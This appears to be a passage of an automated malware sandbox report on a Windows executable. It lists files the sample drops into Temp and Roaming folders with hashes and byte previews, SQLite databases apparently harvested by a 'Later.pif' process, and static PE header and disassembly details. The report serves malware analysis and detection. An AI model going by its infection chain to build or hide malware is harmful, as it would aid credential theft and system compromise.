Preview:	\|.<.C ..l+..>_..DS.)\|._.H...)..uC.Z.@.F'..O...1.:n'Z.U.Ppxa..H....y./..;.tY............Za....#..../.l..T..o\^..Grm.n..Y....eS;...8.....2......B..>J. 2...X...?4.F..\....}.`..8.........].s.;.2.iW.+=.`..(..........`/.d..7..r`...T..W3Y3.Y....F.:G+.j....2...B.x..6..^../.Y.....".Rn..........=/.5.=.,.F..'4.....-.}..6.^~<.h`i..e.i...F.sU.p...cP....t."..T..f.l..}..T.63...o....S......Q..k`cZ'U.`6.r..H.7...m...^[..L.z..aM....[......`.8...G......%....S...)K..#j2.o\|.I-i..D.......>.cX'....P.ee...O..\|.h.mPc"..\|.'A.\|k..'x.x.Uz$........9..j..r....YT.Pd.....+_.`.f...B\|..o......{O.JGC1.P....s\.6w.L.......n...H+].....5f.yLP.m...Y....0.....X=G.H....v4c.....qxS....n.Q .b.y....q..W....DN..ko=....i.n"&7.m.Yg....Y.'."?.y......1.G.mNJ.!a.B."GmXMd..'Y%..-..Bgd.;.X....q.v.h{....b........{.o,\.......!5................(....y..c.P.t...j....K..........0....._...$..V_g.....BVV....ev!........\Kj2P...E8.u.9n.E..wy.7......5S....$.(\|........S....P.u..v...K..=.+K...:..O

C:\Users\user\AppData\Local\Temp\Supervisors

Download File

Process:	C:\Users\user\AppData\Local\Temp\9CFE.exe
File Type:	data
Category:	dropped
Size (bytes):	12176
Entropy (8bit):	7.985064297919076
Encrypted:	false
SSDEEP:	192:vP0a5NuuUErQUayUBoB9yM4Jn+Up6VNO+ICt948QTGUnGRrhy254W+7cc1ErabMK:vP0QNyErzaYF4V+BpRt94uUnGRrhyc+J
MD5:	CF675B73F95464204C8253D9208B4DD3
SHA1:	73A6AEFDA725BBEF399B05D5724302952E593A20
SHA-256:	4F3D8BCF5E55B6521A631653F4351FC8788963D371E634646D87576EA8E27A3D
SHA-512:	C81A0C7BC63C6EE8F15E7388221857B3FD302DF51A5BA3CF841A83C53F00CA58EE58FBEAEB7A6F9894FD1F2967DCCDE4CE63941D5E89FD914BC1CF05656AB025
Malicious:	false
Preview:	.!0.miIu.,..W.sK.E.......:L..\.M.G....{w.`............p....D.1\|;.@.V0V.z:.I=e=.Y..wK.Y.E...UJ.o.'.{m..7.{...:...Gf....].]...z-x.?....U...o.Y.RwRf2e=Du....KY@..bw.........a....p.e......3....Q.....9.<@+P1..j.@....C.A.F;M...?.....`.v\|...[.._....O..9....q......m......-$CP.{.>?..}...........)r.Bkf.....~...8SW3..v.W`o...!.........1.....$..'..."r_gt5..+A....x.......rQwK..~[.c...~.k.T>b...+.c.......T#]lZ...P..7.O...,../...B......u/.Y......%v.7#b_s..^.0.I...(...s'..:..q?.+......\|.YIF...zc......m...{V..BU.V...."S..k.6!.....mL.....I..T.....e.VY.C..I.., 1..\|Q..v....0..E.....C...q..cW.#... .h...+=...{.w...NM.xu.~.M..IS.S...C..QB..\.1..L....>.r......./..k]........}N..1.f...L.).\N.OV...6>..%.2.,.....Q.gBc.q..y?...N.........q.u.>9...r..i$....\..t.....'.P.#.6.rroA.&....Zb.K.vN.<..N..eam..".2.....a...@.....x.[.jl.]i.BA(g...i.. (..\|u....S.B.,X..K. .H9A&.Q...=.I..^~..f....Y...T..bw\0.bH.....&..ht.W.....y&.,.&.C.\|./-t..?...2=.......5=...C.M).e0

C:\Users\user\AppData\Local\Temp\Systematic

Download File

Process:	C:\Users\user\AppData\Local\Temp\9CFE.exe
File Type:	data
Category:	dropped
Size (bytes):	12288
Entropy (8bit):	4.75917671841192
Encrypted:	false
SSDEEP:	192:jlXu90dzlyWpfTaaWs23HjVpx/ARdYlnnnnnnnnnnEBPDSmw/DvRfutO1kk:jlTbyuT2sWjtudtIDvFQg
MD5:	C897DAFB9E9F77D5114B36DF03B849A1
SHA1:	093A220D943739C6F5D3577C7F85EDF7C9AAB399
SHA-256:	86E73888D8945D203B7B32D93D90B8A288E3A4889462A97D31D0DAF22B40641E
SHA-512:	C39C30C9A902097107F3218847B711254DDC24943DF90CAC62AC2F3B2EDE627D8B6881CB313C3525610D3B87C3BAA8C203F6601E94AC07A988DFA20C2C6DD60A
Malicious:	false
Preview:	......J.......J.;.....J.......J.......J.......J.......J..... .J.;...8.J.....H.J.....T.J.....`.J.....l.J.;.....J.. ....J.. ....J.. ....J.; ....J..$....J..$....J..$....J.;$....J..(....J..(....J..(....J..,.. .J..,..,.J..,..8.J..0..D.J..0..P.J..0..\.J..4..h.J..4..t.J..4....J..8....J..8....J..<....J..<....J..@....J..@....J..D....J..H....J..L....J..P....J..\|....J..\|....J...I.B.....J.,.....J.q.....J.....(.J.....4.J.....@.J.....L.J.....X.J.....d.J.....p.J.....\|.J.......J.......J.......J.......J.......J.C.....J.......J.......J.....h.J.).....J.......J.k...(.J.!.....J.c... .J.....$.J.D...0.J.}...<.J.....(.J.....T.J.E...@.J.....`.J.G...l.J.....H.J.....x.J.H...P.J.......J.......J.......J.I.....J.......J.....(.J.A.....J.....X.J.......J.J...`.J.......J.......J.......J.......J.......J.......J.....$.J.....0.J.....<.J.....H.J.....T.J.K...`.J.....l.J.....h.J.....x.J.......J.......J.......J.......J.......J.......J.......J.......J.......J.......J.......J.......J.......J..... .J.....,.J.....8.J.....D.J.....

C:\Users\user\AppData\Local\Temp\Thanks

Download File

Process:	C:\Users\user\AppData\Local\Temp\9CFE.exe
File Type:	data
Category:	dropped
Size (bytes):	168
Entropy (8bit):	4.359094565849235
Encrypted:	false
SSDEEP:	3:TJZcACJ7HWUqt/vllpfrYZcFTS9gXeF+X32ZpAe:teAKhqjvVg3F+X32N
MD5:	A94F23723EAABC72A8FB2AD485C8F759
SHA1:	3EC94C2EBD1B2572EE4C8472CCBE5C27AE5A3B60
SHA-256:	88351214F3762DF6F883442A84905417A2096948F3DDEA7A91F405DFDD5F9C50
SHA-512:	74C84A0AD73C680FB31FC4E45389428DAE51E64C5FD670E6C597FA92EBD96CABDE9B8F8186E39FAB34BCF6C71A05E2F1A7E9C8426A70F952F0C3A2E45BF1EE2D
Malicious:	false
Preview:	rapidconfidentialityspokedrill..MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........sD.R.*.

C:\Users\user\AppData\Local\Temp\Thanksgiving

Download File

Process:	C:\Users\user\AppData\Local\Temp\9CFE.exe
File Type:	data
Category:	dropped
Size (bytes):	175104
Entropy (8bit):	7.998931477420223
Encrypted:	true
SSDEEP:	3072:PpDBJ3GkHAYYzF89/An7xZmRfGnBEP+HR44KGZPe5TVuhArtc:FWpYYx89Y1ZWfGEO44KGI4hsc
MD5:	0F7CF510C583F794073D3E609A1471F0
SHA1:	68A74D6B1BA8BB2CBA3109D01D27C28A76806742
SHA-256:	9CAD5AE241421A9ADE841171CDA0206D086956B7CC965E6E7254D0C48AAF008F
SHA-512:	F4F4AB5B09778DA7F48A0E24FC427B4E83CD4CDE44600FB6DA3ECDE12D09AFEEECFCD7F2E4E49D98ED9A4FC0F8B575FF89FB15155F71B95E0A61C62290B99753
Malicious:	false
Preview:	....z....P...Gx.XT`.. .....,..5u.^.=...8$....:...x..9.O......sl..v....H.....).....k{+<0..e.......d..p..A^.3..Bz.e..`KE....D.JJ.1.A.l..w.........L)"..~..W...ZA.......vl..@....I...c'V.!. .i.0..!......<..g..^...\y.2.O._.i&....M.U...z(.'{.nr$..... .... .6./.:.a......Q..].<....}..t2.C....$.qW..C......H.k.3..h.^..{.V.`...d..}........ klv.b\F..=.M>5...n...r.W_.....D.Z_B...Q..b./....6O8..Z....QC...a.....pI..._/..K.....f..g=.{...Y....-...4....o...t....)o..~3...Y..a&.q....~.M>..p.u+g.....%o.`......%...A./t".........UA..~{.,...dI...WI...-\|J...~.5..b.#..X..\..HK..lJ..LS...H}AU3!EA06M..s$.<.z..g....kC.R.....:!.)......@...F..k;!..u:.=..3............d.a.Mb...l.t.jxI..8.v...r.T...txH..!..)98O...,.XOg;Mm.=..A..FPWW.....Y...$c..F.Kx...i..f3.H....2)...<.9.m....&...4....Rp...O.M.'.F...h.................1.......1...kC.R......%x....}...q..U-...(....%....V..?p.hf..........@.#....{'.l..v..)~.K....dC`:.......c!.).A.&!0..~..}..h..w14.h.%.!4.A...V..+}.,{{.s.x..K...

C:\Users\user\AppData\Local\Temp\That

Download File

Process:	C:\Users\user\AppData\Local\Temp\9CFE.exe
File Type:	data
Category:	dropped
Size (bytes):	46080
Entropy (8bit):	6.648912916021988
Encrypted:	false
SSDEEP:	768:uNK1dvq6LqgaHbdMNkNDUySdK8M4INduPbOUGM4INduPbOU+aI4kSmC:dvtmgMbFuyO1MBNfMBNBo
MD5:	380BEBAEAC764D73E0318B9639AE26B8
SHA1:	56B8D88A77EB4EE735936C69BC72E16682E2AD52
SHA-256:	7ED632F8F8EDB75829C3AA85BAC5539FC6D6EC51816018812E6B79277662E951
SHA-512:	B8AC2BF4664BAFEA1A3FE9F66A7464EC0F59FFD8A1D0A89397E47D6BB9C1BB5E5D2D79F3D24C4CFCD560E486E1B7784C510A8BF5821CCA83910382411062ECC7
Malicious:	false
Preview:	....tKI......KI. ....LI.!....LI."....NI.x...@OI.y...`OI.z...\|OI.......K......OI.R.6.0.0.2.....-. .f.l.o.a.t.i.n.g. .p.o.i.n.t. .s.u.p.p.o.r.t. .n.o.t. .l.o.a.d.e.d.............R.6.0.0.8.....-. .n.o.t. .e.n.o.u.g.h. .s.p.a.c.e. .f.o.r. .a.r.g.u.m.e.n.t.s...........R.6.0.0.9.....-. .n.o.t. .e.n.o.u.g.h. .s.p.a.c.e. .f.o.r. .e.n.v.i.r.o.n.m.e.n.t.......R.6.0.1.0.....-. .a.b.o.r.t.(.). .h.a.s. .b.e.e.n. .c.a.l.l.e.d.........R.6.0.1.6.....-. .n.o.t. .e.n.o.u.g.h. .s.p.a.c.e. .f.o.r. .t.h.r.e.a.d. .d.a.t.a.......R.6.0.1.7.....-. .u.n.e.x.p.e.c.t.e.d. .m.u.l.t.i.t.h.r.e.a.d. .l.o.c.k. .e.r.r.o.r.............R.6.0.1.8.....-. .u.n.e.x.p.e.c.t.e.d. .h.e.a.p. .e.r.r.o.r.............R.6.0.1.9.....-. .u.n.a.b.l.e. .t.o. .o.p.e.n. .c.o.n.s.o.l.e. .d.e.v.i.c.e.............R.6.0.2.4.....-. .n.o.t. .e.n.o.u.g.h. .s.p.a.c.e. .f.o.r. ._.o.n.e.x.i.t./.a.t.e.x.i.t. .t.a.b.l.e.............R.6.0.2.5.....-. .p.u.r.e. .v.i.r.t.u.a.l. .f.u.n.c.t.i.o.n. .c.a.l.l...........R.6.0.2.6.....-. .n.o.t. .e.n.o.u.g.h. .

C:\Users\user\AppData\Local\Temp\Tracked

Download File

Process:	C:\Users\user\AppData\Local\Temp\9CFE.exe
File Type:	data
Category:	dropped
Size (bytes):	45736
Entropy (8bit):	6.954977555616171
Encrypted:	false
SSDEEP:	768:UUxrUCVoyOQ5DuOKHnPiamE9w97OUg4eVDqp8VQ7A:XxrnVRCOa69E9wFOUg/Rqp8b
MD5:	DD30CA8675934FB15AEBF3B8AA7FF6F9
SHA1:	A75B72300E4C24027756862C3A7E48A3D8F268F7
SHA-256:	AE73A9A8258A7F950B35C228975EB5342DBF9D967BB02D7C63DE4946DAD82275
SHA-512:	79BACE600688CAA532B405249BC147228ADEEF2A6CFB25408602D7E0637650457355C3DCBC1C8CC954EA23649A3EC2A7C1F0C910DB1035BB114AB75432071D6A
Malicious:	false
Preview:	........................```.............................................................hhh.................................lll.vvv.\|\|\|.rpn.rnk.xrn.}wr.\|vq.vpl.pmj.pnl.\|\|\|.xxx.ooo.................................```.....................................................................fff.....................................lll.ddd.iii.ppp.ttt.ttt.ppp.kkk.ccc.mmm.....................................```.............................................................................dddxppp.................................................................................................nnn.YYYv.......................................................................................0ggg.........................................................................................bbb.aaa/................................................................................................qqqHhhh.........................................................................eee.aaaF....................................

C:\Users\user\AppData\Local\Temp\Traditions

Download File

Process:	C:\Users\user\AppData\Local\Temp\9CFE.exe
File Type:	data
Category:	dropped
Size (bytes):	46080
Entropy (8bit):	4.822125287417449
Encrypted:	false
SSDEEP:	384:3iwxFr9LE/MpfhwHLWAkqLyH3Per2Wfn2HuboETcKiKjxqH:35bAGWrT+UTcL4qH
MD5:	B8B034328B710A4AE4B606653AE1EA22
SHA1:	72C3749B4702C9626683180DCA7E816FDBE84AE4
SHA-256:	4A95761D77AE6A3DD2881EE0E407F5600755DAE6396559A8C7F1388D5C382526
SHA-512:	FE04D36AB451DA8EC08F1825B577250775550AEF87E200908AFAFF9A02C507895D5F09AC065F7529B92A4B27637D26509371AEA2F5E07CA15860395275F3744B
Malicious:	false
Preview:	m.m.m.m.2.2.2.2.2.2.2.2.2.2.2.2.2.2.2.2.2.2.2.2.2.2.2.m.m.m.m.3.3.3.3.3.3.3.3.3.3.3.3.3.3.3.3.3.3.3.3.3.3.3.3.3.3.3.3.3.3.3.3.3.3.3.3.3.3.3.3.3.3.3.3.3.3.3.3.3.m.m.m.m.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................m.m.................................................................................................

C:\Users\user\AppData\Local\Temp\XQACHMZIHU.docx

Download File

Process:	C:\Users\user\AppData\Local\Temp\78801\Later.pif
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	modified
Size (bytes):	1026
Entropy (8bit):	4.693522326362693
Encrypted:	false
SSDEEP:	24:AYOwn5b+bbufFOUPjYbN1/FTKAGrkJYUZQvhuV:pOwV+bbutOUPj0N1/qkTIhE
MD5:	77EC10F00D9B9E14ECB007C137CF869E
SHA1:	F8B6D94864F593C39D9954BCFAEA4AAE12BFEB9A
SHA-256:	22D0155D015841BFCB00EE1D302110DDC7B01F19EB987C20991FF6B65C4FAB96
SHA-512:	AD432B54D1C4A5D602E721BBA01573FA97F8A71CB3DE4A917260451AAD038A10F13231E3A3FA30713419D8ED98CCD52C0686E62C8A065BF71F19B1CBDD154292
Malicious:	false
Preview:	XQACHMZIHUUJLLWDLKIHTZXFIMTIEGGWQWOGPGDGJCNURBVCJQXVBNPVTOPMNNTTDEGSATMWQVJQFPBRZYSWXFZBRDRTMIPXGPYOBPTBGBRCLKOBPWEQYKSWMRZSUVOUZYXPUNQRYSGIJQYNGSQRYHHJZJUMQJPTACXNBIEDZCTCZFJIXKCYCKIPZNVTFBQBHVQPDZQRVSUVURMXHKEGKOEZEKIBLMVJZUDECREOCIPGSFUCTSCEFBGUVOCNDBATVZGWMVPTZJSFZRHXIRJRCNKGELIWDNZGAMKSBWMWHLFEXGQBOUETVJFOOQXUHVLHCLNPXVMMJAJTHMWAYJLTYJTFGFKQFLSVQPPDXBZGMDPNMFIPCUAIECDYSLACFWPJBZLRMHWQJDDODGYBNCMNPZVZEFOUOYYYZSTZKLXVCNXWPBLBCHTQQEFOILBEJPKRUZJWWDNKGUNAADWZHCOURFFZEJCPBGILFFCNVTANFXLWXQDYJULHEUQGOBNUZUCFIYEITTPKEZQIHPOKWZDMMSUBIQXHUWBBEGGRGQPCKRFMAFMCKBLNPXUXCCXQDHQXPKHVYQWHXEGHICDOZJUCLTBKKZKRKOQAZWXHKAHVKDOFGKTIQHEGCMPYHKLGIDESWNAVASFUCOGCYQQRLWQIWDFFCQYHYHKKPIBOGOKXWOZWCVHKMGTXFXAKYYBZQGZWSMFICJRXGDLJAHPSTMPIAXRZNMJBHJFVZOWDKOKPDQRKIRARJEJMNPCSEWUFHKLELPZWCMWLZTZBFWJTIBXAZBTTJOEGHCLXUZYBYGYULFGJPLUNVJCTDKVUHKFCMCESWXMDLZQKDUWTAECRDBWECXPCHPBCERDAJOGFCHMDGSJLSJJKMJCXPTLKLLKNTYGOHAERGCOCIKXTKCONSVANKBZLAAXCSYEMOBEEWLNTVTKLAAWZXJHAKYJHSMBMGKGYCJVIXFXKLBIIILIGERUIRCZLATCAWQPZDBSCIHXZ

C:\Users\user\AppData\Local\Temp\Your

Download File

Process:	C:\Users\user\AppData\Local\Temp\9CFE.exe
File Type:	data
Category:	dropped
Size (bytes):	27648
Entropy (8bit):	6.749930753107392
Encrypted:	false
SSDEEP:	768:rn5ETavrYFdjVe1XN9Tmv+zD2jsiER24an73S21DU:D5E22VelTXzSj9xb7XDU
MD5:	E96D375AF7A36E051E3A986E138FCC38
SHA1:	A1238B70F097D5DF81E90A513F37682091780D37
SHA-256:	307AEE7C37C09991CF35E789EF76A9B57A4E4F73F48E647FF2E4A06F2DF88DF8
SHA-512:	22D8C4F8AA49242AD330931933ED8A984F67D0099FAD4399283994948D2341AAEE3D0C8660B11BC57C9FECEADC054263FB61817C20E70C838442228A13415A4D
Malicious:	false
Preview:	...@..M..4..n...E.P.M..3..f.}..t..M...o....rL.F.....;p.r...,...F..E...rL.......@.H;.u.....E......M...n....,...G..M.j..4........t.F;w r..O....G,......e....= .I..D$.PVVVh.>J..t$$...uu.D$.3.j.@Z.........Q....YP.L$<..A...t$8.D$.PV3.PPh.>J..t$$...u..D$.3...D$.Vf..F.L$........D$<..u.P.....YV.....Y3..t$.....I.....)/..3.3.f.D$HV.L$../...V.L$.f..f.D$.3.f.D$......f98t#V.L$......f.8;t..D$.P.D$LP..,..YY.s.D$HP.7+..Y..t$.D$HP.(+..Yf.\|DF\t..D$HhL,I.P.,..YY.D$HP.L$<......D$8..rL.P.)J...L$8.B...3..L$.Vf.D$L....f98..b...F.<...3.f.......E.jXj.....E.P.,...e............E.E..E.X....E.X.K..E.....P.E.x.K..E......E......E...K.....I...u.2.../..........P...........GT.......t...j...C;_Xr..N/...v..N...Y./.......C..G.../.......C..F..81....1...E..t.V.....Y....2...7......w......YY..2.....G......G.......?...G..W..95...G..G......<5..H.........C....P..=..P.C..7....K...AQ.3V......5..=....s<.E..E..y...H.K..]..E....dK..}...E.......E..m..}..E..m..e5..=....s<.E..E..y...H.K..]..E....cK..}...E.......E..m..}..E

C:\Users\user\AppData\Local\Temp\tmp1721021440_0

Download File

Process:	C:\Users\user\AppData\Local\Temp\78801\Later.pif
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.8439810553697228
Encrypted:	false
SSDEEP:	24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBO9p7n52GmCWGf+dyMDCFVE1:TeAFawNLopFgU10XJBOB2Gbf+ba+
MD5:	9D46F142BBCF25D0D495FF1F3A7609D3
SHA1:	629BD8CD800F9D5B078B5779654F7CBFA96D4D4E
SHA-256:	C11B443A512184E82D670BA6F7886E98B03C27CC7A3CEB1D20AD23FCA1DE57DA
SHA-512:	AC90306667AFD38F73F6017543BDBB0B359D79740FA266F587792A94FDD35B54CCE5F6D85D5F6CB7F4344BEDAD9194769ABB3864AAE7D94B4FD6748C31250AC2
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp1721021440_3

Download File

Process:	C:\Users\user\AppData\Local\Temp\78801\Later.pif
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
Category:	dropped
Size (bytes):	196608
Entropy (8bit):	1.121297215059106
Encrypted:	false
SSDEEP:	384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
MD5:	D87270D0039ED3A5A72E7082EA71E305
SHA1:	0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
SHA-256:	F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
SHA-512:	18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
Malicious:	false
Preview:	SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp1721021441_0

Download File

Process:	C:\Users\user\AppData\Local\Temp\78801\Later.pif
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.136413900497188
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
MD5:	429F49156428FD53EB06FC82088FD324
SHA1:	560E48154B4611838CD4E9DF4C14D0F9840F06AF
SHA-256:	9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
SHA-512:	1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\wjshsfa

Download File

Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	345600
Entropy (8bit):	4.084859162807512
Encrypted:	false
SSDEEP:	3072:3i2YQ2pbPh1mJ8XrMg8Nwrppwbg0z3TH:38Q2pbJcJz/2Mgq3T
MD5:	1AAE19C81605BF0A5851E42E3574A83C
SHA1:	BA91BCC371D24BA57458BA4A2AA82BC83447A129
SHA-256:	7C7CDED8D1C0784881859ED03340D81C24EA9BF5D9972963CEDF0E40B9856A0C
SHA-512:	8BCF76009E5503C598E2080DCFA9FB1E74783786DFC028EE4CBB066D79D2F4B22C9DF962B6D89EA4429E23BCCB9641574AF3B03BC556D250295C236154B9DBC5
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 34%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........z.............mZ.....mo.....m[.....cb............m^.....mk.....ml....Rich............................PE..L.....jd.................&..........O#.......@....@..........................................................................h..d....P...............................i..............................pb..@............@...............................text....%.......&.................. ..`.rdata...1...@...2...*..............@..@.data............L...\..............@....mazi........ ......................@..@.sicas..F....0......................@..@.rsrc........P......................@..@................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\wjshsfa:Zone.Identifier

Download File

Process:	C:\Windows\explorer.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	4.084859162807512
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	file.exe
File size:	345'600 bytes
MD5:	1aae19c81605bf0a5851e42e3574a83c
SHA1:	ba91bcc371d24ba57458ba4a2aa82bc83447a129
SHA256:	7c7cded8d1c0784881859ed03340d81c24ea9bf5d9972963cedf0e40b9856a0c
SHA512:	8bcf76009e5503c598e2080dcfa9fb1e74783786dfc028ee4cbb066d79d2f4b22c9df962b6d89ea4429e23bccb9641574af3b03bc556d250295c236154b9dbc5
SSDEEP:	3072:3i2YQ2pbPh1mJ8XrMg8Nwrppwbg0z3TH:38Q2pbJcJz/2Mgq3T
TLSH:	B374D01175E4D036E07345B408B8D6F02A3A7C53EBB5958F3A983F7F3D726921A25362
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........z...............mZ......mo......m[......cb..............m^......mk......ml.....Rich............................PE..L.....jd...

File Icon


Icon Hash:	63796de971636e0f

Static PE Info

General

Entrypoint:	0x40234f
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	TERMINAL_SERVER_AWARE
Time Stamp:	0x646A8C2E [Sun May 21 21:25:02 2023 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	1bf8ebf879fee654fc9a3ea11df395e2

Entrypoint Preview

Instruction
call 00007F80B0B311BAh
jmp 00007F80B0B2ED6Eh
push edi
mov eax, esi
and eax, 0Fh
test eax, eax
jne 00007F80B0B2EFA7h
mov edx, ecx
and ecx, 7Fh
shr edx, 07h
je 00007F80B0B2EF47h
jmp 00007F80B0B2EEE8h
lea ebx, dword ptr [ebx+00000000h]
movdqa xmm0, dqword ptr [esi]
movdqa xmm1, dqword ptr [esi+10h]
movdqa xmm2, dqword ptr [esi+20h]
movdqa xmm3, dqword ptr [esi+30h]
movdqa dqword ptr [edi], xmm0
movdqa dqword ptr [edi+10h], xmm1
movdqa dqword ptr [edi+20h], xmm2
movdqa dqword ptr [edi+30h], xmm3
movdqa xmm4, dqword ptr [esi+40h]
movdqa xmm5, dqword ptr [esi+50h]
movdqa xmm6, dqword ptr [esi+60h]
movdqa xmm7, dqword ptr [esi+70h]
movdqa dqword ptr [edi+40h], xmm4
movdqa dqword ptr [edi+50h], xmm5
movdqa dqword ptr [edi+60h], xmm6
movdqa dqword ptr [edi+70h], xmm7
lea esi, dword ptr [esi+00000080h]
lea edi, dword ptr [edi+00000080h]
dec edx
jne 00007F80B0B2EE85h
test ecx, ecx
je 00007F80B0B2EF2Bh
mov edx, ecx
shr edx, 04h
test edx, edx
je 00007F80B0B2EEF9h
lea ebx, dword ptr [ebx+00000000h]
movdqa xmm0, dqword ptr [esi]
movdqa dqword ptr [edi], xmm0
lea esi, dword ptr [esi+10h]
lea edi, dword ptr [edi+10h]
dec edx
jne 00007F80B0B2EED1h
and ecx, 0Fh
je 00007F80B0B2EF06h
mov eax, ecx
shr ecx, 02h
je 00007F80B0B2EEEFh
mov edx, dword ptr [esi]
mov dword ptr [edi], edx
lea esi, dword ptr [esi+04h]
lea edi, dword ptr [edi+04h]
dec ecx
jne 00007F80B0B2EED5h
mov ecx, eax
and ecx, 00000000h

Rich Headers

Programming Language:

[C++] VS2010 build 30319
[ASM] VS2010 build 30319
[ C ] VS2010 build 30319
[IMP] VS2008 SP1 build 30729
[RES] VS2010 build 30319
[LNK] VS2010 build 30319

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x268b8	0x64	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x1c95000	0x7fe8	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x2691c	0x1c	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x26270	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x24000	0x198	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x225fe	0x22600	938827d9d1ec5a427ee6f74cadfe1da7	False	0.7392542613636364	data	6.979655173728229	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x24000	0x31be	0x3200	f3ea2c7ca6e2aff78c480fddb493366e	False	0.35140625	data	4.9739377470741974	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x28000	0x1c696a8	0x24c00	024e93736ae5638d80847d98babcaa23	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.mazi	0x1c92000	0x400	0x400	0f343b0931126a20f133d67c2b018a3b	False	0.0166015625	data	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.sicas	0x1c93000	0x1846	0x1a00	3c63825015aabd810674f44afac6d12b	False	0.004356971153846154	data	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
